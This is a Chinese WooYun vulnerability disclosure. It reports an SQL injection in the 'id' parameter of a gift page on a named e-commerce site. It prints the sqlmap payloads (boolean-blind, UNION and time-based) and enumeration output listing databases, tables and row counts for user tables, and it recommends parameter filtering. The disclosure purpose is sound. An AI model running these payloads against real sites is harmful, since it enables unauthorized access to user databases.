乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://www.taowola.com/gift.php?type=info&id=200
id参数存在注入
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=info&id=200 AND 4843=4843 Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: type=info&id=-6615 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7571693a,0x5168744a575678484448,0x3a7476793a),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: type=info&id=200 AND SLEEP(5)---web application technology: PHP 5.4.23, Nginxback-end DBMS: MySQL 5.0.11
查看一下当前数据库和用户
web application technology: PHP 5.4.23, Nginxback-end DBMS: MySQL 5.0.11current user: '10.47.36.39:12945'current database: 'taowola'current user is DBA: False
列数据库
web application technology: PHP 5.4.23, Nginxback-end DBMS: MySQL 5.0.11available databases [4]:[*] information_schema[*] mysql[*] performance_schema[*] taowola
66个表,不全列出来了
web application technology: PHP 5.4.23, Nginxback-end DBMS: MySQL 5.0.11Database: taowola[66 tables]
直接看一下数据量
web application technology: PHP 5.4.23, Nginxback-end DBMS: MySQL 5.0.11Database: taowola+---------------------------+---------+| Table | Entries |+---------------------------+---------+| wp_jifen_log | 180981 || wp_user | 116896 || logs | 56728 || wp_items | 47381 |
参数过滤
未能联系到厂商或者厂商积极拒绝